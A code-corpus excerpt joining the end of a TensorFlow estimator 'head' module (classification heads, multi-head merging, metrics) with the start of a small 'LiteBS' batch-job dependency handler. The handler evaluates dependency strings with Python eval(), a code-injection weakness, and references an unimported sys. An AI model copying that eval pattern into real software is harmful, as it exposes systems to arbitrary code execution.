Dict of prediction `Tensor` keyed by `PredictionKey`.
"""
with ops.name_scope(None, "predictions", (logits,)):
class_ids = math_ops.argmax(
logits, 1, name=prediction_key.PredictionKey.CLASSES)
if self._label_keys:
table = lookup_lib.index_to_string_table_from_tensor(
mapping=self._label_keys,
name="class_string_lookup")
classes = table.lookup(class_ids)
else:
classes = class_ids
return {
prediction_key.PredictionKey.LOGITS: logits,
prediction_key.PredictionKey.PROBABILITIES:
nn.softmax(
logits, name=prediction_key.PredictionKey.PROBABILITIES),
prediction_key.PredictionKey.CLASSES: classes
}
def _metrics(self, eval_loss, predictions, labels, weights):
"""Returns a dict of metrics keyed by name."""
with ops.name_scope(
"metrics",
values=((eval_loss, self._labels(labels), self._label_ids(labels),
weights) + tuple(six.itervalues(predictions)))):
logits = predictions[prediction_key.PredictionKey.LOGITS]
probabilities = predictions[prediction_key.PredictionKey.PROBABILITIES]
classes = predictions[prediction_key.PredictionKey.CLASSES]
metrics = {_summary_key(self.head_name, mkey.LOSS):
metrics_lib.streaming_mean(eval_loss)}
# TODO(b/29366811): This currently results in both an "accuracy" and an
# "accuracy/threshold_0.500000_mean" metric for binary classification.
metrics[_summary_key(self.head_name, mkey.ACCURACY)] = (
metrics_lib.streaming_accuracy(
classes, self._labels(labels), weights))
if not self._label_keys:
# Classes are IDs. Add some metrics.
for class_id in self._metric_class_ids:
metrics[_summary_key(
self.head_name, mkey.CLASS_PREDICTION_MEAN % class_id)] = (
_class_predictions_streaming_mean(classes, weights, class_id))
# TODO(ptucker): Add per-class accuracy, precision, recall.
metrics[_summary_key(
self.head_name, mkey.CLASS_LABEL_MEAN % class_id)] = (
_class_labels_streaming_mean(
self._label_ids(labels), weights, class_id))
metrics[_summary_key(
self.head_name, mkey.CLASS_PROBABILITY_MEAN % class_id)] = (
_predictions_streaming_mean(probabilities, weights, class_id))
metrics[_summary_key(
self.head_name, mkey.CLASS_LOGITS_MEAN % class_id)] = (
_predictions_streaming_mean(logits, weights, class_id))
return metrics
def _to_labels_tensor(labels, label_name):
"""Returns label as a tensor.
Args:
labels: Label `Tensor` or `SparseTensor` or a dict containig labels.
label_name: Label name if labels is a dict.
Returns:
Label `Tensor` or `SparseTensor`.
"""
labels = labels[label_name] if isinstance(labels, dict) else labels
return framework_lib.convert_to_tensor_or_sparse_tensor(labels)
def _check_no_sparse_tensor(x):
"""Raises ValueError if the given tensor is `SparseTensor`."""
if isinstance(x, sparse_tensor.SparseTensor):
raise ValueError("SparseTensor is not supported.")
def _sparse_labels_to_indicator(labels, num_classes):
"""If labels is `SparseTensor`, converts it to indicator `Tensor`.
Args:
labels: Label `Tensor` or `SparseTensor`.
num_classes: Number of classes.
Returns:
Dense label `Tensor`.
Raises:
ValueError: If labels is `SparseTensor` and `num_classes` < 2.
"""
if isinstance(labels, sparse_tensor.SparseTensor):
if num_classes < 2:
raise ValueError("Must set num_classes >= 2 when passing labels as a "
"SparseTensor.")
return math_ops.to_int64(
sparse_ops.sparse_to_indicator(labels, num_classes))
return labels
def _assert_labels_rank(labels):
return control_flow_ops.Assert(
math_ops.less_equal(array_ops.rank(labels), 2),
("labels shape should be either [batch_size, 1] or [batch_size]",))
class _BinarySvmHead(_SingleHead):
"""`Head` for binary classification using SVM."""
def __init__(self, label_name, weight_column_name, enable_centered_bias,
head_name, thresholds):
def _loss_fn(labels, logits, weights=None):
with ops.name_scope(None, "hinge_loss", (logits, labels)) as name:
with ops.control_dependencies((_assert_labels_rank(labels),)):
labels = array_ops.reshape(labels, shape=(-1, 1))
loss = losses_lib.hinge_loss(logits=logits, labels=labels, scope=name)
return _compute_weighted_loss(loss, weights)
super(_BinarySvmHead, self).__init__(
problem_type=constants.ProblemType.LOGISTIC_REGRESSION,
logits_dimension=1,
label_name=label_name,
weight_column_name=weight_column_name,
head_name=head_name)
self._thresholds = thresholds if thresholds else (.5,)
self._loss_fn = _loss_fn
self._enable_centered_bias = enable_centered_bias
def create_model_fn_ops(self,
features,
mode,
labels=None,
train_op_fn=None,
logits=None,
logits_input=None,
scope=None):
"""See `Head`."""
with variable_scope.variable_scope(
scope,
default_name=self.head_name or "binary_svm_head",
values=(tuple(six.itervalues(features)) +
(labels, logits, logits_input))):
labels = self._transform_labels(mode=mode, labels=labels)
logits = _logits(logits_input, logits, self.logits_dimension)
return _create_model_fn_ops(
features=features,
mode=mode,
loss_fn=self._loss_fn,
logits_to_predictions_fn=self._logits_to_predictions,
metrics_fn=self._metrics,
# TODO(zakaria): Handle labels for export.
create_output_alternatives_fn=self._create_output_alternatives,
labels=labels,
train_op_fn=train_op_fn,
logits=logits,
logits_dimension=self.logits_dimension,
head_name=self.head_name,
weight_column_name=self.weight_column_name,
enable_centered_bias=self._enable_centered_bias)
def _transform_labels(self, mode, labels):
"""Applies transformations to labels tensor."""
if (mode == model_fn.ModeKeys.INFER) or (labels is None):
return None
labels_tensor = _to_labels_tensor(labels, self._label_name)
_check_no_sparse_tensor(labels_tensor)
return labels_tensor
def _logits_to_predictions(self, logits):
"""See `_MultiClassHead`."""
with ops.name_scope(None, "predictions", (logits,)):
return {
prediction_key.PredictionKey.LOGITS:
logits,
prediction_key.PredictionKey.CLASSES:
math_ops.argmax(
_one_class_to_two_class_logits(logits),
1,
name=prediction_key.PredictionKey.CLASSES)
}
def _metrics(self, eval_loss, predictions, labels, weights):
"""See `_MultiClassHead`."""
with ops.name_scope("metrics", values=(
[eval_loss, labels, weights] + list(six.itervalues(predictions)))):
metrics = {_summary_key(self.head_name, mkey.LOSS):
metrics_lib.streaming_mean(eval_loss)}
# TODO(b/29366811): This currently results in both an "accuracy" and an
# "accuracy/threshold_0.500000_mean" metric for binary classification.
classes = predictions[prediction_key.PredictionKey.CLASSES]
metrics[_summary_key(self.head_name, mkey.ACCURACY)] = (
metrics_lib.streaming_accuracy(classes, labels, weights))
# TODO(sibyl-vie3Poto): add more metrics relevant for svms.
return metrics
class _MultiLabelHead(_SingleHead):
"""`Head` for multi-label classification."""
# TODO(zakaria): add signature and metric for multilabel.
def __init__(self,
n_classes,
label_name,
weight_column_name,
enable_centered_bias,
head_name,
thresholds,
metric_class_ids=None,
loss_fn=None):
super(_MultiLabelHead, self).__init__(
problem_type=constants.ProblemType.CLASSIFICATION,
logits_dimension=n_classes,
label_name=label_name,
weight_column_name=weight_column_name,
head_name=head_name)
self._thresholds = thresholds if thresholds else (.5,)
self._loss_fn = loss_fn if loss_fn else _sigmoid_cross_entropy_loss
self._enable_centered_bias = enable_centered_bias
self._metric_class_ids = tuple([] if metric_class_ids is None else
metric_class_ids)
for class_id in self._metric_class_ids:
if (class_id < 0) or (class_id >= n_classes):
raise ValueError("Class ID %s not in [0, %s)." % (class_id, n_classes))
def create_model_fn_ops(self,
features,
mode,
labels=None,
train_op_fn=None,
logits=None,
logits_input=None,
scope=None):
"""See `Head`."""
with variable_scope.variable_scope(
scope,
default_name=self.head_name or "multi_label_head",
values=(tuple(six.itervalues(features)) +
(labels, logits, logits_input))):
labels = self._transform_labels(mode=mode, labels=labels)
logits = _logits(logits_input, logits, self.logits_dimension)
return _create_model_fn_ops(
features=features,
mode=mode,
loss_fn=self._loss_fn,
logits_to_predictions_fn=self._logits_to_predictions,
metrics_fn=self._metrics,
create_output_alternatives_fn=_classification_output_alternatives(
self.head_name, self._problem_type),
labels=labels,
train_op_fn=train_op_fn,
logits=logits,
logits_dimension=self.logits_dimension,
head_name=self.head_name,
weight_column_name=self.weight_column_name,
enable_centered_bias=self._enable_centered_bias)
def _transform_labels(self, mode, labels):
"""Applies transformations to labels tensor."""
if (mode == model_fn.ModeKeys.INFER) or (labels is None):
return None
labels_tensor = _to_labels_tensor(labels, self._label_name)
labels_tensor = _sparse_labels_to_indicator(labels_tensor,
self._logits_dimension)
return labels_tensor
def _logits_to_predictions(self, logits):
"""See `_MultiClassHead`."""
with ops.name_scope(None, "predictions", (logits,)):
return {
prediction_key.PredictionKey.LOGITS:
logits,
prediction_key.PredictionKey.PROBABILITIES:
math_ops.sigmoid(
logits, name=prediction_key.PredictionKey.PROBABILITIES),
prediction_key.PredictionKey.CLASSES:
math_ops.to_int64(
math_ops.greater(logits, 0),
name=prediction_key.PredictionKey.CLASSES)
}
def _metrics(self, eval_loss, predictions, labels, weights):
"""Returns a dict of metrics keyed by name."""
with ops.name_scope("metrics", values=(
[eval_loss, labels, weights] + list(six.itervalues(predictions)))):
classes = predictions[prediction_key.PredictionKey.CLASSES]
probabilities = predictions[prediction_key.PredictionKey.PROBABILITIES]
logits = predictions[prediction_key.PredictionKey.LOGITS]
metrics = {_summary_key(self.head_name, mkey.LOSS):
metrics_lib.streaming_mean(eval_loss)}
# TODO(b/29366811): This currently results in both an "accuracy" and an
# "accuracy/threshold_0.500000_mean" metric for binary classification.
metrics[_summary_key(self.head_name, mkey.ACCURACY)] = (
metrics_lib.streaming_accuracy(classes, labels, weights))
metrics[_summary_key(self.head_name, mkey.AUC)] = _streaming_auc(
probabilities, labels, weights)
metrics[_summary_key(self.head_name, mkey.AUC_PR)] = _streaming_auc(
probabilities, labels, weights, curve="PR")
for class_id in self._metric_class_ids:
# TODO(ptucker): Add per-class accuracy, precision, recall.
metrics[_summary_key(
self.head_name, mkey.CLASS_PREDICTION_MEAN % class_id)] = (
_predictions_streaming_mean(classes, weights, class_id))
metrics[_summary_key(
self.head_name, mkey.CLASS_LABEL_MEAN % class_id)] = (
_indicator_labels_streaming_mean(labels, weights, class_id))
metrics[_summary_key(
self.head_name, mkey.CLASS_PROBABILITY_MEAN % class_id)] = (
_predictions_streaming_mean(probabilities, weights, class_id))
metrics[_summary_key(
self.head_name, mkey.CLASS_LOGITS_MEAN % class_id)] = (
_predictions_streaming_mean(logits, weights, class_id))
metrics[_summary_key(self.head_name, mkey.CLASS_AUC % class_id)] = (
_streaming_auc(probabilities, labels, weights, class_id))
metrics[_summary_key(self.head_name, mkey.CLASS_AUC_PR % class_id)] = (
_streaming_auc(probabilities, labels, weights, class_id,
curve="PR"))
return metrics
class _MultiHead(Head):
"""`Head` implementation for multi objective learning.
This class is responsible for using and merging the output of multiple
`Head` objects.
All heads stem from the same logits/logit_input tensor.
Common usage:
For simple use cases you can pass the activation of hidden layer like
this from your model_fn,
```python
last_hidden_layer_activation = ... Build your model.
multi_head = ...
return multi_head.create_model_fn_ops(
..., logits_input=last_hidden_layer_activation, ...)
```
Or you can create a logits tensor of
[batch_size, multi_head.logits_dimension] shape. _MultiHead will split the
logits for you.
return multi_head.create_model_fn_ops(..., logits=logits, ...)
For more complex use cases like a multi-task/multi-tower model or when logits
for each head has to be created separately, you can pass a dict of logits
where the keys match the name of the single heads.
```python
logits = {"head1": logits1, "head2": logits2}
return multi_head.create_model_fn_ops(..., logits=logits, ...)
```
Here is what this class does,
+ For training, merges losses of each heads according a function provided by
user, calls user provided train_op_fn with this final loss.
+ For eval, merges metrics by adding head_name suffix to the keys in eval
metrics.
+ For inference, updates keys in prediction dict to a 2-tuple,
(head_name, prediction_key)
"""
def __init__(self, heads, loss_merger):
"""_Head to merges multiple _Head objects.
Args:
heads: list of _Head objects.
loss_merger: function that takes a list of loss tensors for the heads
and returns the final loss tensor for the multi head.
Raises:
ValueError: if any head does not have a name.
"""
self._logits_dimension = 0
for head in heads:
if not head.head_name:
raise ValueError("Members of MultiHead must have names.")
self._logits_dimension += head.logits_dimension
self._heads = heads
self._loss_merger = loss_merger
@property
def logits_dimension(self):
return self._logits_dimension
def create_model_fn_ops(self,
features,
mode,
labels=None,
train_op_fn=None,
logits=None,
logits_input=None,
scope=None):
"""See `_Head.create_model_fn_ops`.
Args:
features: Input `dict` of `Tensor` objects.
mode: Estimator's `ModeKeys`.
labels: Labels `Tensor`, or `dict` of same.
train_op_fn: Function that takes a scalar loss and returns an op to
optimize with the loss.
logits: Concatenated logits for all heads or a dict of head name to logits
tensor. If concatenated logits, it should have (batchsize, x) shape
where x is the sum of `logits_dimension` of all the heads,
i.e., same as `logits_dimension` of this class. create_model_fn_ops
will split the logits tensor and pass logits of proper size to each
head. This is useful if we want to be agnostic about whether you
creating a single versus multihead. logits can also be a dict for
convenience where you are creating the head specific logits explicitly
and don't want to concatenate them yourself.
logits_input: tensor to build logits from.
scope: Optional scope for variable_scope. If provided, will be passed to
all heads. Most users will want to set this to `None`, so each head
constructs a separate variable_scope according to its `head_name`.
Returns:
`ModelFnOps`.
Raises:
ValueError: if `mode` is not recognized, or neither or both of `logits`
and `logits_input` is provided.
"""
_check_mode_valid(mode)
all_model_fn_ops = []
if logits is None:
# Use logits_input.
for head in self._heads:
all_model_fn_ops.append(
head.create_model_fn_ops(
features=features,
mode=mode,
labels=labels,
train_op_fn=no_op_train_fn,
logits_input=logits_input,
scope=scope))
else:
head_logits_pairs = []
if isinstance(logits, dict):
head_logits_pairs = []
for head in self._heads:
head_logits_pairs.append((head, logits[head.head_name]))
else:
# Split logits for each head.
head_logits_pairs = zip(self._heads, self._split_logits(logits))
for head, head_logits in head_logits_pairs:
all_model_fn_ops.append(
head.create_model_fn_ops(
features=features,
mode=mode,
labels=labels,
train_op_fn=no_op_train_fn,
logits=head_logits,
scope=scope))
if mode == model_fn.ModeKeys.TRAIN:
if train_op_fn is None:
raise ValueError("train_op_fn can not be None in TRAIN mode.")
return self._merge_train(all_model_fn_ops, train_op_fn)
if mode == model_fn.ModeKeys.INFER:
return self._merge_infer(all_model_fn_ops)
if mode == model_fn.ModeKeys.EVAL:
return self._merge_eval(all_model_fn_ops)
raise ValueError("mode=%s unrecognized" % str(mode))
def _split_logits(self, logits):
"""Splits logits for heads.
Args:
logits: the logits tensor.
Returns:
A list of logits for the individual heads.
"""
all_logits = []
begin = 0
for head in self._heads:
current_logits_size = head.logits_dimension
current_logits = array_ops.slice(logits, [0, begin],
[-1, current_logits_size])
all_logits.append(current_logits)
begin += current_logits_size
return all_logits
def _merge_train(self, all_model_fn_ops, train_op_fn):
"""Merges list of ModelFnOps for training.
Args:
all_model_fn_ops: list of ModelFnOps for the individual heads.
train_op_fn: Function to create train op. See `create_model_fn_ops`
documentaion for more details.
Returns:
ModelFnOps that merges all heads for TRAIN.
"""
losses = []
additional_train_ops = []
for m in all_model_fn_ops:
losses.append(m.loss)
additional_train_ops.append(m.train_op)
loss = self._loss_merger(losses)
train_op = train_op_fn(loss)
train_op = control_flow_ops.group(train_op, *additional_train_ops)
return model_fn.ModelFnOps(
mode=model_fn.ModeKeys.TRAIN,
loss=loss,
train_op=train_op)
def _merge_infer(self, all_model_fn_ops):
"""Merges list of ModelFnOps for inference.
Args:
all_model_fn_ops: list of ModelFnOps for the individual heads.
Returns:
ModelFnOps that Merges all the heads for INFER.
"""
predictions = {}
output_alternatives = {}
for head, m in zip(self._heads, all_model_fn_ops):
head_name = head.head_name
output_alternatives[head_name] = m.output_alternatives[head_name]
for k, v in m.predictions.items():
predictions[(head_name, k)] = v
return model_fn.ModelFnOps(
mode=model_fn.ModeKeys.INFER,
predictions=predictions,
output_alternatives=output_alternatives)
def _merge_eval(self, all_model_fn_ops):
"""Merges list of ModelFnOps for eval.
Args:
all_model_fn_ops: list of ModelFnOps for the individual heads.
Returns:
ModelFnOps that merges all the heads for EVAL.
"""
predictions = {}
metrics = {}
losses = []
for head, m in zip(self._heads, all_model_fn_ops):
losses.append(m.loss)
head_name = head.head_name
for k, v in m.predictions.items():
predictions[(head_name, k)] = v
for k, v in m.eval_metric_ops.items():
# metrics["%s/%s" % (k, head_name)] = v
metrics[k] = v
loss = self._loss_merger(losses)
return model_fn.ModelFnOps(
mode=model_fn.ModeKeys.EVAL,
predictions=predictions,
loss=loss,
eval_metric_ops=metrics)
def _weight_tensor(features, weight_column_name):
"""Returns weights as 1d `Tensor`."""
if not weight_column_name:
return None
with ops.name_scope(None, "weight_tensor",
tuple(six.itervalues(features))):
return math_ops.to_float(features[weight_column_name])
# TODO(zakaria): This function is needed for backward compatibility and should
# be removed when we migrate to core.
def _compute_weighted_loss(loss_unweighted, weight, name="loss"):
"""Returns a tuple of (loss_train, loss_report).
loss is used for gradient descent while weighted_average_loss is used for
summaries to be backward compatible.
loss is different from the loss reported on the tensorboard as we
should respect the example weights when computing the gradient.
L = sum_{i} w_{i} * l_{i} / B
where B is the number of examples in the batch, l_{i}, w_{i} are individual
losses, and example weight.
Args:
loss_unweighted: Unweighted loss
weight: Weight tensor
name: Optional name
Returns:
A tuple of losses. First one for training and the second one for reporting.
"""
with ops.name_scope(name, values=(loss_unweighted, weight)) as name_scope:
if weight is None:
loss = math_ops.reduce_mean(loss_unweighted, name=name_scope)
return loss, loss
weight = weights_broadcast_ops.broadcast_weights(weight, loss_unweighted)
with ops.name_scope(None, "weighted_loss",
(loss_unweighted, weight)) as name:
weighted_loss = math_ops.multiply(loss_unweighted, weight, name=name)
weighted_loss_mean = math_ops.reduce_mean(weighted_loss, name=name_scope)
weighted_loss_normalized = math_ops.div(
math_ops.reduce_sum(weighted_loss),
math_ops.to_float(math_ops.reduce_sum(weight)),
name="weighted_average_loss")
return weighted_loss_mean, weighted_loss_normalized
def _wrap_custom_loss_fn(loss_fn):
def _wrapper(labels, logits, weights=None):
if weights is None:
loss = loss_fn(labels, logits)
else:
loss = loss_fn(labels, logits, weights)
return loss, loss
return _wrapper
def _check_mode_valid(mode):
"""Raises ValueError if the given mode is invalid."""
if (mode != model_fn.ModeKeys.TRAIN and mode != model_fn.ModeKeys.INFER and
mode != model_fn.ModeKeys.EVAL):
raise ValueError("mode=%s unrecognized." % str(mode))
def _get_arguments(func):
"""Returns a spec of given func."""
_, func = tf_decorator.unwrap(func)
if hasattr(func, "__code__"):
# Regular function.
return tf_inspect.getargspec(func)
elif hasattr(func, "__call__"):
# Callable object.
return _get_arguments(func.__call__)
elif hasattr(func, "func"):
# Partial function.
return _get_arguments(func.func)
def _verify_loss_fn_args(loss_fn):
args = _get_arguments(loss_fn).args
for arg_name in ["labels", "logits", "weights"]:
if arg_name not in args:
raise ValueError("Argument %s not found in loss_fn." % arg_name)
def _centered_bias(logits_dimension, head_name=None):
"""Returns centered_bias `Variable`.
Args:
logits_dimension: Last dimension of `logits`. Must be >= 1.
head_name: Optional name of the head.
Returns:
`Variable` with shape `[logits_dimension]`.
Raises:
ValueError: if `logits_dimension` is invalid.
"""
if (logits_dimension is None) or (logits_dimension < 1):
raise ValueError("Invalid logits_dimension %s." % logits_dimension)
# Do not create a variable with variable_scope.get_variable, because that may
# create a PartitionedVariable, which does not support indexing, so
# summary.scalar will not work.
centered_bias = variable_scope.variable(
name="centered_bias_weight",
initial_value=array_ops.zeros(shape=(logits_dimension,)),
trainable=True)
for dim in range(logits_dimension):
if head_name:
summary.scalar("centered_bias/bias_%d/%s" % (dim, head_name),
centered_bias[dim])
else:
summary.scalar("centered_bias/bias_%d" % dim, centered_bias[dim])
return centered_bias
def _centered_bias_step(centered_bias, batch_size, labels, loss_fn, weights):
"""Creates and returns training op for centered bias."""
with ops.name_scope(None, "centered_bias_step", (labels,)) as name:
logits_dimension = array_ops.shape(centered_bias)[0]
logits = array_ops.reshape(
array_ops.tile(centered_bias, (batch_size,)),
(batch_size, logits_dimension))
with ops.name_scope(None, "centered_bias", (labels, logits)):
centered_bias_loss = math_ops.reduce_mean(
loss_fn(labels, logits, weights), name="training_loss")
# Learn central bias by an optimizer. 0.1 is a convervative lr for a
# single variable.
return training.AdagradOptimizer(0.1).minimize(
centered_bias_loss, var_list=(centered_bias,), name=name)
def _summary_key(head_name, val):
return "%s/%s" % (val, head_name) if head_name else val
def _train_op(loss, labels, train_op_fn, centered_bias, batch_size, loss_fn,
weights):
"""Returns op for the training step."""
if centered_bias is not None:
centered_bias_step = _centered_bias_step(
centered_bias=centered_bias,
batch_size=batch_size,
labels=labels,
loss_fn=loss_fn,
weights=weights)
else:
centered_bias_step = None
with ops.name_scope(None, "train_op", (loss, labels)):
train_op = train_op_fn(loss)
if centered_bias_step is not None:
train_op = control_flow_ops.group(train_op, centered_bias_step)
return train_op
def _sigmoid_cross_entropy_loss(labels, logits, weights=None):
with ops.name_scope(None, "sigmoid_cross_entropy_loss",
(logits, labels)) as name:
# sigmoid_cross_entropy_with_logits requires [batch_size, n_classes] labels.
loss = nn.sigmoid_cross_entropy_with_logits(
labels=math_ops.to_float(labels), logits=logits, name=name)
return _compute_weighted_loss(loss, weights)
def _float_weights_or_none(weights):
if weights is None:
return None
with ops.name_scope(None, "float_weights", (weights,)) as name:
return math_ops.to_float(weights, name=name)
def _indicator_labels_streaming_mean(labels, weights=None, class_id=None):
labels = math_ops.to_float(labels)
weights = _float_weights_or_none(weights)
if weights is not None:
weights = weights_broadcast_ops.broadcast_weights(weights, labels)
if class_id is not None:
if weights is not None:
weights = weights[:, class_id]
labels = labels[:, class_id]
return metrics_lib.streaming_mean(labels, weights=weights)
def _predictions_streaming_mean(predictions,
weights=None,
class_id=None):
predictions = math_ops.to_float(predictions)
weights = _float_weights_or_none(weights)
if weights is not None:
weights = weights_broadcast_ops.broadcast_weights(weights, predictions)
if class_id is not None:
if weights is not None:
weights = weights[:, class_id]
predictions = predictions[:, class_id]
return metrics_lib.streaming_mean(predictions, weights=weights)
# TODO(ptucker): Add support for SparseTensor labels.
def _class_id_labels_to_indicator(labels, num_classes):
if (num_classes is None) or (num_classes < 2):
raise ValueError("Invalid num_classes %s." % num_classes)
with ops.control_dependencies((_assert_labels_rank(labels),)):
labels = array_ops.reshape(labels, (-1,))
return array_ops.one_hot(labels, depth=num_classes, axis=-1)
def _class_predictions_streaming_mean(predictions, weights, class_id):
return metrics_lib.streaming_mean(
array_ops.where(
math_ops.equal(
math_ops.to_int32(class_id), math_ops.to_int32(predictions)),
array_ops.ones_like(predictions),
array_ops.zeros_like(predictions)),
weights=weights)
def _class_labels_streaming_mean(labels, weights, class_id):
return metrics_lib.streaming_mean(
array_ops.where(
math_ops.equal(
math_ops.to_int32(class_id), math_ops.to_int32(labels)),
array_ops.ones_like(labels), array_ops.zeros_like(labels)),
weights=weights)
def _streaming_auc(predictions, labels, weights=None, class_id=None,
curve="ROC"):
# pylint: disable=missing-docstring
predictions = math_ops.to_float(predictions)
if labels.dtype.base_dtype != dtypes.bool:
logging.warning("Casting %s labels to bool.", labels.dtype)
labels = math_ops.cast(labels, dtypes.bool)
weights = _float_weights_or_none(weights)
if weights is not None:
weights = weights_broadcast_ops.broadcast_weights(weights, predictions)
if class_id is not None:
if weights is not None:
weights = weights[:, class_id]
predictions = predictions[:, class_id]
labels = labels[:, class_id]
return metrics_lib.streaming_auc(
predictions, labels, weights=weights, curve=curve)
def _assert_class_id(class_id, num_classes=None):
"""Average label value for class `class_id`."""
if (class_id is None) or (class_id < 0):
raise ValueError("Invalid class_id %s." % class_id)
if num_classes is not None:
if num_classes < 2:
raise ValueError("Invalid num_classes %s." % num_classes)
if class_id >= num_classes:
raise ValueError("Invalid class_id %s." % class_id)
def _streaming_accuracy_at_threshold(predictions, labels, weights, threshold):
threshold_predictions = math_ops.to_float(
math_ops.greater_equal(predictions, threshold))
return metrics_lib.streaming_accuracy(
predictions=threshold_predictions, labels=labels, weights=weights)
def _streaming_precision_at_threshold(predictions, labels, weights, threshold):
precision_tensor, update_op = metrics_lib.streaming_precision_at_thresholds(
predictions, labels=labels, thresholds=(threshold,),
weights=_float_weights_or_none(weights))
return array_ops.squeeze(precision_tensor), array_ops.squeeze(update_op)
def _streaming_recall_at_threshold(predictions, labels, weights, threshold):
precision_tensor, update_op = metrics_lib.streaming_recall_at_thresholds(
predictions, labels=labels, thresholds=(threshold,),
weights=_float_weights_or_none(weights))
return array_ops.squeeze(precision_tensor), array_ops.squeeze(update_op)
def _classification_output_alternatives(head_name, problem_type,
label_keys=None):
"""Creates a func to generate output alternatives for classification.
Servo expects classes to be a string tensor, and have the same dimensions
as the probabilities tensor. It should contain the labels of the corresponding
entries in probabilities. This function creates a new classes tensor that
satisfies these conditions and can be exported.
Args:
head_name: Name of the head.
problem_type: `ProblemType`
label_keys: Optional label keys
Returns:
A function to generate output alternatives.
"""
def _create_output_alternatives(predictions):
"""Creates output alternative for the Head.
Args:
predictions: a dict of {tensor_name: Tensor}, where 'tensor_name' is a
symbolic name for an output Tensor possibly but not necessarily taken
from `PredictionKey`, and 'Tensor' is the corresponding output Tensor
itself.
Returns:
`dict` of {submodel_name: (problem_type, {tensor_name: Tensor})}, where
'submodel_name' is a submodel identifier that should be consistent across
the pipeline (here likely taken from the head_name),
'problem_type' is a `ProblemType`,
'tensor_name' is a symbolic name for an output Tensor possibly but not
necessarily taken from `PredictionKey`, and
'Tensor' is the corresponding output Tensor itself.
Raises:
ValueError: if predictions does not have PredictionKey.PROBABILITIES key.
"""
probabilities = predictions.get(prediction_key.PredictionKey.PROBABILITIES)
if probabilities is None:
raise ValueError("%s missing in predictions" %
prediction_key.PredictionKey.PROBABILITIES)
with ops.name_scope(None, "_classification_output_alternatives",
(probabilities,)):
batch_size = array_ops.shape(probabilities)[0]
if label_keys:
classes = array_ops.tile(
input=array_ops.expand_dims(input=label_keys, axis=0),
multiples=[batch_size, 1],
name="classes_tensor")
else:
n = array_ops.shape(probabilities)[1]
classes = array_ops.tile(
input=array_ops.expand_dims(input=math_ops.range(n), axis=0),
multiples=[batch_size, 1])
classes = string_ops.as_string(classes, name="classes_tensor")
exported_predictions = {
prediction_key.PredictionKey.PROBABILITIES: probabilities,
prediction_key.PredictionKey.CLASSES: classes}
return {head_name: (problem_type, exported_predictions)}
return _create_output_alternatives
# Aliases
# TODO(zakaria): Remove these aliases, See b/34751732
_regression_head = regression_head
_poisson_regression_head = poisson_regression_head
_multi_class_head = multi_class_head
_binary_svm_head = binary_svm_head
_multi_label_head = multi_label_head
_multi_head = multi_head
_Head = Head
| vrv/tensorflow | tensorflow/contrib/learn/python/learn/estimators/head.py | Python | apache-2.0 | 78,330 |
#!/usr/bin/env python
#
# Copyright 2013 Simone Campagna
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
__author__ = 'Simone Campagna'
__copyright__ = 'Copyright (c) 2013 Simone Campagna'
__license__ = 'Apache License Version 2.0'
__version__ = '1.0'
import ast
from .errors import *
from .litebs_types import Job
import collections
class DependencyError(LiteBS_Error):
pass
class DependencySyntaxError(LiteBS_Error):
pass
class DepNodeTransformer(ast.NodeTransformer):
def visit_And(self, node):
return ast.copy_location(ast.Or(), node)
def visit_UnaryOp(self, node):
if isinstance(node.op, ast.Not):
return ast.copy_location(node.operand, node)
class LiteBS_DependencyHandler(object):
PREFIX = "DEP_"
def __init__(self):
prefix = self.PREFIX
l_prefix = len(prefix)
e_globals = {}
v_globals = {}
d_globals = {}
def make_v_wrap(method):
def v_wrap(*l_args, **kw_args):
method(*l_args, **kw_args)
return False
return v_wrap
for member_name in dir(self):
if member_name.startswith(prefix):
member = getattr(self, member_name)
dep_function_name = member_name[l_prefix:]
e_globals[dep_function_name] = member
d_globals[dep_function_name] = self.get_depended_job
if isinstance(member, collections.Callable):
v_globals[dep_function_name] = make_v_wrap(member)
else:
v_globals[dep_function_name] = False
self._e_globals = e_globals
self._v_globals = v_globals
self._d_globals = d_globals
self._mutable = False
def get_depended_job(self, job_id, *l_args, **kw_args):
self._depended_job_ids.add(job_id)
def get_job(self, job_id):
if not job_id in self._jobs_d:
raise DependencySyntaxError("Job {0} does not exists".format(job_id))
job = self._jobs_d[job_id]
if not job.status in Job.COMPLETED_STATUS_SET:
self._mutable = True
return job
def DEP_terminated(self, job_id):
job = self.get_job(job_id)
if job.status in Job.COMPLETED_STATUS_SET:
return True
else:
return False
def DEP_running(self, job_id):
job = self.get_job(job_id)
if job.status == Job.STATUS_RUNNING:
return True
else:
return False
def DEP_deleted(self, job_id):
job = self.get_job(job_id)
if job.status == Job.STATUS_DELETED:
return True
else:
return False
def DEP_completed(self, job_id, exit_code=None):
job = self.get_job(job_id)
if job.status == Job.STATUS_COMPLETED:
if exit_code is None or job.exit_code == exit_code:
return True
else:
return False
else:
return False
def init(self, jobs_d):
self._mutable = False
self._jobs_d = jobs_d
def evaluate(self, dependency, jobs_d):
self.init(jobs_d)
value = eval(dependency, self._e_globals)
return bool(value), self._mutable
def validate(self, dependency, jobs_d):
self.init(jobs_d)
self._mutable = False
root = ast.parse(dependency, mode="eval")
nt = DepNodeTransformer()
t_root = nt.visit(root)
t_root = root
try:
code = compile(t_root, "", "eval")
eval(code, self._v_globals)
return True
except:
error_type, error, tb = sys.exc_info()
raise DependencyError("{0}: {1}".format(error_type.__name__, error))
def depended_job_ids(self, dependency, depended_job_ids):
self.init({})
#if depended_job_ids is None:
#depended_job_ids = set()
assert isinstance(depended_job_ids, set)
self._depended_job_ids = depended_job_ids
value = eval(dependency, self._d_globals)
return self._depended_job_ids
if __name__ == "__main__":
class Job(object):
STATUS_PENDING = 'P'
STATUS_RUNNING = 'R'
STATUS_STARTING = 'S'
STATUS_EXITING = 'E'
STATUS_HELD = 'H'
STATUS_COMPLETED = 'C'
STATUS_DELETED = 'D'
COMPLETED_STATUS_SET = {STATUS_COMPLETED, STATUS_DELETED}
def __init__(self, job_id, status, exit_code=None):
self.job_id = job_id
self.status = status
self.exit_code = exit_code
def __str__(self):
return "{0}({1}, {2!r}, {3})".format(self.__class__.__name__, self.job_id, self.status, self.exit_code)
jobs_l = []
jobs_l.append(Job(1, Job.STATUS_PENDING))
jobs_l.append(Job(2, Job.STATUS_RUNNING))
jobs_l.append(Job(3, Job.STATUS_COMPLETED, 0))
